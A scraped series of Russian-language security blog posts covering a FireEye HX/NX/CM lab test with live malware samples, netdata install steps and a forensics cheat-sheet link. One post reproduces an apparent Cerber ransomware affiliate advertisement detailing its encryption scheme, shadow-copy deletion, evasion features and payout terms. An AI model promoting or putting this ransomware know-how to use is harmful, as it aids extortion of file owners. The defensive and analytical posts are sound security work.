Решение Fireeye HX позволяет отслеживать вредоносную активность на рабочей станции, для более оперативного реагирование на инциденты информационной безопасности, расследование инцидентов (forensic, слепки памяти и т.п.) и изоляцией зараженной станции, для предотвращения распространения инфекции далее по сети.<br />
<div>
Недавно HX попал в нашу лабораторию и я сделал базовые настройки и протестировал отработку связки - CM + NX + HX. </div>
<div>
<br /></div>
<div>
CM - платформа "центрального менеджмента" для остальных устройств, служит так же для обмена индикаторами компрометации (IOC) между всеми устройствами.</div>
<div>
<br /></div>
<div>
NX - предназначен для анализа проходящего через него трафика, на наличие вредоносного кода или аномальной активности.</div>
<div>
<br /></div>
<div>
HX - было упомянуто в самом начале :) </div>
<div>
<br /></div>
<div>
Топологию можно найти в других постах, просто к ней добавилось устройство HX, которое было подключено к CM :<br />
<span style="font-size: x-small;">Базовая настройка Fireeye NX EX FX CM basic config</span></div>
<div>
<a href="http://devnulls.blogspot.com/2015/04/fireeye-nx-ex-fx-cm-basic-config.html">http://devnulls.blogspot.com/2015/04/fireeye-nx-ex-fx-cm-basic-config.html</a><br />
<span style="font-size: x-small;">Тестирование Fireeye EX в режиме MTA + URL Dynamic Analysis / Test Fireeye EX MTA + URLDA</span></div>
<div>
<a href="http://devnulls.blogspot.com/2015/05/fireeye-ex-mta-url-dynamic-analysis.html">http://devnulls.blogspot.com/2015/05/fireeye-ex-mta-url-dynamic-analysis.html</a><br />
<span style="font-size: x-small;">BCC. Postfix / MS Exchange + Fireeye EX</span></div>
<div>
<a href="http://devnulls.blogspot.com/2015/07/bcc-postfix.html">http://devnulls.blogspot.com/2015/07/bcc-postfix.html</a><br />
<span style="font-size: x-small;">Настройка и тестирование Fireeye EX в режиме MTA / Fireeye EX MTA config</span></div>
<div>
<a href="http://devnulls.blogspot.com/2015/05/fireeye-ex-mta-fireeye-ex-mta-config.html">http://devnulls.blogspot.com/2015/05/fireeye-ex-mta-fireeye-ex-mta-config.html</a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCxxUDmyUsVlt-NSHCHYSBzzYGNHHrqHYD-32KcEnrkX_i4vFApJ3z3noQHSlBk_FBpCMAykVQG79VVekvofb5wumGPhXGOd78cJNSQwVYqehW7AzPeqs-JQLc0w5N4zAZjMCulWFzCZg/s1600/1image.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCxxUDmyUsVlt-NSHCHYSBzzYGNHHrqHYD-32KcEnrkX_i4vFApJ3z3noQHSlBk_FBpCMAykVQG79VVekvofb5wumGPhXGOd78cJNSQwVYqehW7AzPeqs-JQLc0w5N4zAZjMCulWFzCZg/s640/1image.jpg" width="640" /></a></div>
<div>
<br /></div>
<div>
<a name='more'></a>Предварительная настройка, не отличается от других коробок. </div>
<div>
После связки, видим на CM подключенный HX, и NX</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvUxlCjliiK99vwX9hQKm7jVBpTA4TYDAEhRIwUnwGbm2lcCYzC3TEpS1tMQQ78C3g2YJ2FjiJs4xQiTqEx1SCCmSBRWsY6ubLkeVF_fNpE4UJkI18BWIp5sWQBFTNPR0fQZa5Zz51NxU/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="324" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvUxlCjliiK99vwX9hQKm7jVBpTA4TYDAEhRIwUnwGbm2lcCYzC3TEpS1tMQQ78C3g2YJ2FjiJs4xQiTqEx1SCCmSBRWsY6ubLkeVF_fNpE4UJkI18BWIp5sWQBFTNPR0fQZa5Zz51NxU/s640/1.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC-SvrsDGQMYe4mCivoodqeWN-cutj4OS20Vw54u3Lf6bQe41jWldl6BFmU533bzemlLhrGg_o9F-beyFYOat2HoIq1BzULzWgGjEnxVvliDHAV0SlO9kGHb7OIloWHRjVoUfzpW9tfZ4/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC-SvrsDGQMYe4mCivoodqeWN-cutj4OS20Vw54u3Lf6bQe41jWldl6BFmU533bzemlLhrGg_o9F-beyFYOat2HoIq1BzULzWgGjEnxVvliDHAV0SlO9kGHb7OIloWHRjVoUfzpW9tfZ4/s640/2.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Сам HX доступен по адресу и порту:</div>
<div>
https://192.168.1.106:3000/login/login</div>
<div>
<br /></div>
<div>
Даш выглядит таким образом:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGGwLeUkgtwBT7o6GCPh6JEGrRTJIauJ-dcYAX9W-kMttKEdgePL-mn49df_ITSgBgOGudTE_aZ8HRB-x7Pt_bXTZQBP87FRhUhnnQEC79FlnEn0aIHRR_I1nPNst6vLfNlqA9310WfE0/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="490" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGGwLeUkgtwBT7o6GCPh6JEGrRTJIauJ-dcYAX9W-kMttKEdgePL-mn49df_ITSgBgOGudTE_aZ8HRB-x7Pt_bXTZQBP87FRhUhnnQEC79FlnEn0aIHRR_I1nPNst6vLfNlqA9310WfE0/s640/3.png" width="640" /></a></div>
<div>
<br /></div>
<div>
После проверки лицензий, и установки последних обновлений, можно приступить к настройке хостов.</div>
<div>
<br /></div>
<div>
Указываем адрес сервера, для агентов, в моем случае, он один:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkeJ3ZwocdQXhcN0yJWk1BCrgQbkLzqtNAUHNUyytl67FUyv4umdIWWAOz2ntYKwdL2ABdMNkt7ZPchbn4Z5GdggIbLLpu9b9GznJzHvh5iz59s3OmXYM7II0BnxDoAU0zmAPqo4WSZnI/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkeJ3ZwocdQXhcN0yJWk1BCrgQbkLzqtNAUHNUyytl67FUyv4umdIWWAOz2ntYKwdL2ABdMNkt7ZPchbn4Z5GdggIbLLpu9b9GznJzHvh5iz59s3OmXYM7II0BnxDoAU0zmAPqo4WSZnI/s640/4.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
Далее можем сбилдить агента, и загрузить его.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSXynK2ICWT7OD_JwG3lT0HYBJAdy6bTYiU52RHHMP2SEd_rzlug9iw9_iy4CcfN9pTQP4XYoFq9-7LaswdhIJ1sOJBzNiOezYVKx88cS2ptQmy97iktC_N4m59tu0A4aA46g0VQ8RSB8/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSXynK2ICWT7OD_JwG3lT0HYBJAdy6bTYiU52RHHMP2SEd_rzlug9iw9_iy4CcfN9pTQP4XYoFq9-7LaswdhIJ1sOJBzNiOezYVKx88cS2ptQmy97iktC_N4m59tu0A4aA46g0VQ8RSB8/s640/5.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
После загрузки агента, его необходимо установить на хост. Я установлю вручную, для массовой установки можно использовать механизмы AD и т.п.<br />
Установил, подождал отстук агента на сервер. Он подтаскивает разные метаданные, необходимые для индификации хоста.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_29qRnGPigj5iYIdgky37AFYxZTtfYiYGHGRV_Bq7_HKML4A57DzuZQLIejdAGGua-8O3ZtAf92XQEuuj6kcpmbIYgjQYLnD9Okuh6EuASA3cp3q4HVedaeaVk0Ca2ZOstnSVZ1UpaIo/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_29qRnGPigj5iYIdgky37AFYxZTtfYiYGHGRV_Bq7_HKML4A57DzuZQLIejdAGGua-8O3ZtAf92XQEuuj6kcpmbIYgjQYLnD9Okuh6EuASA3cp3q4HVedaeaVk0Ca2ZOstnSVZ1UpaIo/s640/6.png" width="640" /></a></div>
<br />
Одной из удобных фишек - это создание групп, что позволяет более наглядно рулить парком машин.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUeIJpOA7iiAmo7b4t1cZcv20NG_uDwmVNw5HTP5roTuDS_7eU9FbQVUcjAYWW7Vd6WxEBJwiZ10wnmUmmORXNLBrZTiz-cMAdXqovs9JYdB9eV6wXz29yn4Nm_lo7f0BIdBlBXSr5QZs/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUeIJpOA7iiAmo7b4t1cZcv20NG_uDwmVNw5HTP5roTuDS_7eU9FbQVUcjAYWW7Vd6WxEBJwiZ10wnmUmmORXNLBrZTiz-cMAdXqovs9JYdB9eV6wXz29yn4Nm_lo7f0BIdBlBXSr5QZs/s640/7.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Различные способы создание групп :</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFc_dw_Zxxz9RlkTq5um9a9shuOB-fCZ6iABrVCBRFisGaDJUF1mjatICVHTTg1mON2vPH1JrknbZzHnesSP0rN2xZKSEr_Mz5eJvPRVH0whZ8F5sWZXGwMRnCqB4idysytsF2xhq6-2I/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="430" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFc_dw_Zxxz9RlkTq5um9a9shuOB-fCZ6iABrVCBRFisGaDJUF1mjatICVHTTg1mON2vPH1JrknbZzHnesSP0rN2xZKSEr_Mz5eJvPRVH0whZ8F5sWZXGwMRnCqB4idysytsF2xhq6-2I/s640/8.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMPEg1VykBj9VFX4EEwjKMgu8f6khJBpIoZpF6VDti1aSRpPNAagBNBEb2PyXuTbFaBbKzY_F4BD7IwVR_ueEgWY_r2BN5RtmQLps6qZlM1f3_04whndbbaTgdtOknk54f8ei1mJBaB5E/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMPEg1VykBj9VFX4EEwjKMgu8f6khJBpIoZpF6VDti1aSRpPNAagBNBEb2PyXuTbFaBbKzY_F4BD7IwVR_ueEgWY_r2BN5RtmQLps6qZlM1f3_04whndbbaTgdtOknk54f8ei1mJBaB5E/s640/9.png" width="640" /></a></div>
<br />
И так сказать избранные хосты:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfCqgm-k9OdRBSEs8cba2MGCTNzXoms6muWwrsp_VbbqP-BhnauvJCeoDVyguCVTCU11r1e-cjUaPIIxn6TaRv3fiJDt_tdfO0sfKPgFHiwDScB_8jhHchRI-jpZrwV0uRL6wFnfzcvOU/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfCqgm-k9OdRBSEs8cba2MGCTNzXoms6muWwrsp_VbbqP-BhnauvJCeoDVyguCVTCU11r1e-cjUaPIIxn6TaRv3fiJDt_tdfO0sfKPgFHiwDScB_8jhHchRI-jpZrwV0uRL6wFnfzcvOU/s640/10.png" width="640" /></a></div>
<br />
Нашел в интернете семплы малвари, я принялся скачивать их на рабочую станцию, тем самым имитируя заражение системы (фишинг, дроперы и т.п.)<br />
И запустил.<br />
В этот момент FE NX перехватывает бинарники, архивы и прочее из трафика, и параллельно размазывает их по виртуалкам, для динамического анализа кода.<br />
Через консоль, можно наблюдать за внутренними процессами, сколько виртуалок поднялось, что отработало и т.п.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWtfvp6Ahyphenhyphen612DJL63hE1TtGwLxvBuTXINez6CxCA9aLLm3YP3kuDnXVsGAF7QJtS4GXlC5OWMEKMn3hyVoNTQNnTn048_K2-owfkwsBIiL6YR-a2dYxJPqZAsSlTeb_3sT07Qxrm5yNw/s1600/18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="530" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWtfvp6Ahyphenhyphen612DJL63hE1TtGwLxvBuTXINez6CxCA9aLLm3YP3kuDnXVsGAF7QJtS4GXlC5OWMEKMn3hyVoNTQNnTn048_K2-owfkwsBIiL6YR-a2dYxJPqZAsSlTeb_3sT07Qxrm5yNw/s640/18.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Часто-используемые команды:</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
show object-analysis all</div>
<div class="separator" style="clear: both;">
show object-analysis done</div>
<div class="separator" style="clear: both;">
show object-analysis running</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
show object-analysis</div>
<div class="separator" style="clear: both;">
show web-incident</div>
<div class="separator" style="clear: both;">
show web-analysis</div>
<div class="separator" style="clear: both;">
show workorders</div>
<div class="separator" style="clear: both;">
show submission</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
В случае обнаружения вредоноса, NX отправляет данные о семпле CM, который далее передает на HX:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpaLKyRZXwmybneRQsoXO6S4dzoAdknI2ZtT7usWQhaHoGdnQmau-kG3sLyLpAKsQ1ROtQM0WY_G7XkSf6zOI6c1Mf8ekIcHQL-8xI5E-DXjnkA92YkhPma5kSKexqnHKrDvpFUB3nQgA/s1600/22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpaLKyRZXwmybneRQsoXO6S4dzoAdknI2ZtT7usWQhaHoGdnQmau-kG3sLyLpAKsQ1ROtQM0WY_G7XkSf6zOI6c1Mf8ekIcHQL-8xI5E-DXjnkA92YkhPma5kSKexqnHKrDvpFUB3nQgA/s640/22.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Он же опрашивает агента, который установлен на ПК на наличие индикаторов, которые связывают логически вредный бинарник и станцию, на которой он был запущен, после чего у нас есть развернутая картина того, что прошло в сеть, и где оно сдетонировало.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpIjjaKkIue30iHOxqNLngTWlW7ofPkqlEWNIGOORHGquBBN9Vr961k7H7FoUGI1X6zY2g8KhpTeJSEU97-vtSf3cPa6kU0yAxjpWpkweERBvYiozxbzxIDkmgyvko8Iz3SxGGWy4aIos/s1600/23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpIjjaKkIue30iHOxqNLngTWlW7ofPkqlEWNIGOORHGquBBN9Vr961k7H7FoUGI1X6zY2g8KhpTeJSEU97-vtSf3cPa6kU0yAxjpWpkweERBvYiozxbzxIDkmgyvko8Iz3SxGGWy4aIos/s640/23.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg34gGgaF2lySbejWA3VvpnEcbbB4yVxq-8CYCfDyXn-6YRvZqTpUrFY_nZZDt9r2vrtOnObnHFDUyxduOYlFni1DCTu3fTU-Ui4fmgelOzNl7lj4OHP-ECxi0Qv_qf7XH4WUBYcTBCLvU/s1600/24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg34gGgaF2lySbejWA3VvpnEcbbB4yVxq-8CYCfDyXn-6YRvZqTpUrFY_nZZDt9r2vrtOnObnHFDUyxduOYlFni1DCTu3fTU-Ui4fmgelOzNl7lj4OHP-ECxi0Qv_qf7XH4WUBYcTBCLvU/s640/24.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
В случае угрозы, можно заблокировать машину, для дальнейшего расследования:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2uLOF_Z3gR50YYRU79HjaEGo9V8OdYx9yaY_PLbModD6sRqdUxIue0YwS8Ubx5DCGBdy6b9TnpqT9XR61ReBeP0z_GteUf_B1QdR_sceDHLC8MXiYKtPhouGliCmYmHtkioqW5KIymcw/s1600/25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2uLOF_Z3gR50YYRU79HjaEGo9V8OdYx9yaY_PLbModD6sRqdUxIue0YwS8Ubx5DCGBdy6b9TnpqT9XR61ReBeP0z_GteUf_B1QdR_sceDHLC8MXiYKtPhouGliCmYmHtkioqW5KIymcw/s640/25.png" width="640" /></a></div>
<br />
Через HX можно снять различного рода дампы с зараженной системы, залить из в Redline, и продолжить расследование:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwTCmo_p2E0Qc7RKIGbrDxdJoJHmFKNwx-RSF6WbNQ8OWro0NZnwBAcfMHTo9o3NlOLjYCpVkWnWPLcTjb8HEn3hH7aME8y62fWZQAK4yONbiM5pMwBK-P6EeyNTlOvoCrw_ZLDDDtOlc/s1600/27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwTCmo_p2E0Qc7RKIGbrDxdJoJHmFKNwx-RSF6WbNQ8OWro0NZnwBAcfMHTo9o3NlOLjYCpVkWnWPLcTjb8HEn3hH7aME8y62fWZQAK4yONbiM5pMwBK-P6EeyNTlOvoCrw_ZLDDDtOlc/s640/27.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Загруженные файлы с HX</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpJ4hycSe4A0IfVBaHCyCIm6XEnpR9Fuk8P4IUSh3rEwboUa51P1BKSZRLYUUmv6NDMviENBaTtBce4ZqyZI2LDZMqqW9b1Pn1N1tCgG51Xdhey2i28dB2jcbhSrDtNcSewLPr13LH70E/s1600/26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpJ4hycSe4A0IfVBaHCyCIm6XEnpR9Fuk8P4IUSh3rEwboUa51P1BKSZRLYUUmv6NDMviENBaTtBce4ZqyZI2LDZMqqW9b1Pn1N1tCgG51Xdhey2i28dB2jcbhSrDtNcSewLPr13LH70E/s640/26.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Вообщем, интересная коробка, хорошо подходит для форенсики. Есть хорошим дополнением к волатилити :)<br />
Будем тестить дальше....<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div>
<br /></div>
<div>
<br /></div>
</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-30660511360073811842016-04-08T15:56:00.001+03:002016-04-08T15:57:55.762+03:00Красивый мониторинг сервака [netdata] (Real Time Performance Monitoring)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<img alt="netdata" height="600" src="https://cloud.githubusercontent.com/assets/2662304/14092712/93b039ea-f551-11e5-822c-beadbf2b2a2e.gif" width="640" /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
Дебиан-лайк:</div>
<div>
<br /></div>
apt-get install zlib1g-dev gcc make git autoconf autogen automake pkg-config<br />
<div>
<br /></div>
<div>
Для цента тоже самое, проблемы только с zlib1g-dev.</div>
<div>
<br /></div>
<div>
yum install zlib-devel ghc-zlib-devel zlib-static gcc make git autoconf autogen automake pkg-config</div>
<div>
<br /></div>
git clone https://github.com/firehol/netdata.git --depth=1<br />
<div>
cd netdata</div>
<div>
./netdata-installer.sh<br />
<div style="text-align: center;">
<a href="https://github.com/firehol/netdata">https://github.com/firehol/netdata</a></div>
</div>
</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-71552943042473037842016-03-22T12:19:00.001+02:002016-03-22T12:19:29.567+02:00Сбор цифровых отпечатков. Memory forensics.<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDYwMCCy4I1OkyOQFULVvW3rwiXdjiXk5FqloVH1I9ZcgqZAkLZE7rWzmxwiT3Egs7kXEAiXcxke1XWei-rO479dE4iSD68vIIfTReMH3fsITz5QsfwskTWLNu8IO5yyPuuyW5C129YJc/s1600/%25D0%25B9%25D0%25B9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDYwMCCy4I1OkyOQFULVvW3rwiXdjiXk5FqloVH1I9ZcgqZAkLZE7rWzmxwiT3Egs7kXEAiXcxke1XWei-rO479dE4iSD68vIIfTReMH3fsITz5QsfwskTWLNu8IO5yyPuuyW5C129YJc/s640/%25D0%25B9%25D0%25B9.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEeZgGU7P3oxWp5URAg_pB8lnBG6Jj6xlpQB8K-BqHclzreFGkruU7wNayA4O6WckeY7anwuSMqvlekgLfR7MRK9jTv-xfHRRo1DSHXHYvI30NSiV0Ke4daFmG2Yc3t8ie9lLmOmgsVtQ/s1600/%25D0%25B9%25D0%25B9%25D0%25B9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEeZgGU7P3oxWp5URAg_pB8lnBG6Jj6xlpQB8K-BqHclzreFGkruU7wNayA4O6WckeY7anwuSMqvlekgLfR7MRK9jTv-xfHRRo1DSHXHYvI30NSiV0Ke4daFmG2Yc3t8ie9lLmOmgsVtQ/s640/%25D0%25B9%25D0%25B9%25D0%25B9.png" width="640" /></a></div>
<br />
<div style="text-align: center;">
<a href="https://www.google.com.ua/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj01dWpiNTLAhUGwHIKHSS9CwkQFggbMAA&url=https%3A%2F%2Fdigital-forensics.sans.org%2Fmedia%2Fmemory-forensics-cheat-sheet.pdf&usg=AFQjCNGiiXBMKlU0Ro7YPMtBSBQv9o1prw&sig2=YBDgcSj7OBgx5_JpasTFhA"><span style="font-size: large;">Memory Forensics Cheat Sheet v1.2</span></a></div>
</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-49339088041177089602016-03-21T10:18:00.003+02:002016-03-21T10:18:54.028+02:00[Cerber Ransomware] Схема работы / Партнерка<div dir="ltr" style="text-align: left;" trbidi="on">
Как монетизируют загрузки:<br />
<br />Схема шифрования:<br />--------------------------------------------------<br />После запуска на компьютере пользователя генерируются локальные ключи RSA 576 бит (приватный и публичный).<br />В дальнейшем эти ключи будут использоваться для шифрования и расшифровки файлов.<br /><br />Предварительно в релиз зашит глобальный публичный ключ RSA 2048 бит.<br />Данный ключ используется для шифрования локального приватного ключа RSA 576 бит.<br /><br />Глобальный приватный ключ RSA 2048 бит находится на .Onion сервере в анонимной сети Tor.<br /><br />После шифрования локального приватного ключа RSA 576 бит генерируется список файлов для шифрования.<br />Данный список содержит файлы определенных расширений, список сортируется по времени модификации и важности файлов.<br /><br />Начинается шифрование файлов.<br /><br />Каждый файл шифруется с помощью алгоритма RC4 с длиной ключа 128 бит.<br />Для каждого файла генерируется случайный ключ, который шифруется с помощью локального публичного ключа RSA 576 бит.<br />Также с помощью локального публичного ключа RSA 576 бит шифруется заголовок исходного файла, что значительно затрудняет расшифровку файлов без дешифратора (месяцы на расшифровку 1-ого файла).<br /><br />Шифруется не только содержимое файлов, но и их имена.<br />Меняется время создания и время модификации файлов.<br /><br />После шифрования всех файлов пользователю показывается инструкция по расшифровке.<br /><br />Для расшифровки файлов пользователю необходимо скачать "Tor Browser", зайти на специальный .Onion сайт (лэндинг) и следовать инструкциям на этом сайте.<br /><br />Лэндинг<br />--------------------------------------------------<br /><a name='more'></a><br />Лэндинг имеет понятный и дружелюбный интерфейс.<br /><br />Перед авторизацией на сайте есть возможность выбрать один из 12 языков:<br /><br />- Английский;<br />- Арабский;<br />- Голландский;<br />- Испанский;<br />- Итальянский;<br />- Китайский;<br />- Немецкий;<br />- Польский;<br />- Португальский;<br />- Турецкий;<br />- Французский;<br />- Японский.<br /><br />Все тексты на сайте составлены с учетом психологии человека, все переводы текстов были сделаны профессиональными переводчиками, носителями языка.<br /><br />На сайте пользователь видит подробную инструкцию по оплате и получению дешифратора.<br /><br />Для каждого пользователя генерируется уникальный Bitcoin адрес для оплаты.<br /><br />Ведется счетчик 7-ми дней, по истечению которого стоимость дешифратора возрастает в два раза.<br /><br />Имеется возможность посылать перевод частями для проверки работоспособности системы.<br /><br />После оплаты пользователь получает возможность скачать дешифратор.<br /><br /><br /><br />Схема расшифровки:<br />--------------------------------------------------<br /><br />После запуска дешифратор с помощью анонимной сети Tor посылает на удаленный .Onion сервер зашифрованный локальный приватный ключ RSA 576 бит.<br /><br />В случае успешной предварительной оплаты сервер расшифровывает локальный приватный ключ RSA 576 бит с помощью глобального приватного ключа RSA 2048 бит и отдает в ответ расшифрованные данные. <br /><br />Начинается расшифровка файлов.<br /><br />* Глобальный приватный ключ RSA 2048 бит находится на удаленном .Onion сервере и никогда никому не выдается!<br /><br /><br />Основные преимущества партнерской программы:<br />--------------------------------------------------<br /><br />- полностью анонимная работа всей системы, никто, даже участники партнерской программы, никогда не смогут узнать, где находятся командные сервера;<br />- инновационный метод отправки анонимной статистики (сервера невозможно деанонимизировать, отправка статистики без использования Tor и других анонимных сетей);<br />- обход большинства проактивных защит;<br />- при удачном LPE (Exploit Leading to Privilege Escalation, примерно в 95% случаев) происходит удаление теневых копий Windows (https://en.wikipedia.org/wiki/Shadow_Copy);<br />- процесс шифрования и процесс отправки статистики невозможно завершить с помощью диспетчера задач;<br />- стабильная работа на всех версиях Windows XP+ x86 / x64 с любыми правами и под любой учетной записью;<br />- продолжение шифрования файлов после перезагрузки;<br />- самоудаление после успешного шифрования всех файлов;<br />- многопоточное шифрования 380 типов файлов любого размера с очень высокой скоростью;<br />- шифрование файлов и их имен на всех логических дисках, съемных носителях и ресурсах в локальной сети;<br />- подробнейшая риал-тайм статистика (Web / XML) по загрузкам и платежам в удобной партнерской панели на .Onion сервере;<br />- автоматические выплаты в Bitcoin два раза в месяц, либо выплаты по запросу в течение 48 часов;<br />- малый размер релиза ~100 кб., криптованный релиз ~200 кб., рекрипт файла происходит каждые 15 минут;<br />- возможность создавать сабаккаунты и назначать стоимость дешифровки для каждого сабаккаунта по отдельности;<br />- высокие рейты для партнеров;<br />- реферальная система 5% (система вознаграждения партнеров проекта за приглашение новых пользователей);<br />- вежливый и дружелюбный саппорт в онлайне, система тикетов внутри партнерской панели.</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-80977204770026906102016-03-14T11:43:00.003+02:002016-03-14T11:53:58.306+02:00DDoS Mitigation Arbor Peakflow SP and Juniper MX [ flowspec / blackhole ]<div dir="ltr" style="text-align: left;" trbidi="on">
Добрый день !<br />
<br />
<div>
